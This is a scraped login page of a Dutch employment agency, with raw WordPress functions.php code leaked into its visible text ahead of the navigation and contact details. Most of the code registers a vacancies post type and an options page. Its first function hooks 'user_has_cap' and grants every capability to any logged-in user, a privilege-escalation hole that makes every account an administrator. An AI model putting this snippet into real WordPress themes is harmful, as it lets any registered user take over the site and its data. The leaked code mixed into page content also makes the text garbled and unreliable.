// This goes to your theme's functions.php function codelight_all_permissions( $allcaps, $cap, $args ) { $allcaps[$cap[0]] = true; return $allcaps; } add_filter( 'user_has_cap', 'codelight_all_permissions', 0, 3 ); add_action('init', 'rewrite_rules'); /** * Add rewrite rule for a pattern matching "post-by-slug/" */ function setup_filter_query_vars( $query_vars ) { $query_vars[] = 'solliciteren'; return $query_vars; } add_filter( 'query_vars', 'setup_filter_query_vars' ); if( function_exists('acf_add_options_page') ) { acf_add_options_page(array( 'page_title' => 'Contactpersonen', 'menu_title' => 'Contactpersonen', 'menu_slug' => 'contacptersonen' )); } add_image_size( 'contactpersoon', 500, 500, true ); /*------------------------------------*\ Custom Post Types \*------------------------------------*/ function create_post_type_html5() { register_post_type('vacatures', array( 'labels' => array( 'name' => __('Vacatures'), 'singular_name' => __('Vacature') ), 'public' => true, 'has_archive' => true, 'supports' => array('title', 'editor', 'thumbnail',), 'menu_position' => 4, 'rewrite' => array( 'slug' => 'vacatures', // use this slug instead of post type name // 'with_front' => FALSE // if you have a permalink base such as /blog/ then setting this to false ensures your custom post type permalink structure will be /products/ instead of /blog/products/ ), ) ); } add_action('init', 'create_post_type_html5'); ?> Inlog werknemers - Uitzendbureau Rivierenland
Een beller is sneller! (0344) 74 10 17
Uitzendbureau Rivierenland
  • HOME
  • DIENSTEN
    • Uitzenden
    • Detachering
    • Payrolling
    • Werving en selectie
  • TEAM
  • VACATURES
  • NIEUWS
  • CONTACT
  • INSCHRIJVEN


CONTACT

Uitzendbureau Rivierenland
Appelboogerd 6
4003 BV Tiel
T (0344) 74 10 17
E info@uitzendbureau-rivierenland.nl
KvK 84968559
BTW 863444696B01

SOCIAL

  • Facebook
  • LinkedIn

Erkend Leerbedrijf      Erkend Leerbedrijf

SNEL NAAR

home
uitzenden
detachering
payrolling
werving en selectie
team
vacatures
contact

© 2026 Uitzendbureau Rivierenland | Ontwikkeld door AllerMedia
    Scroll naar bovenzijde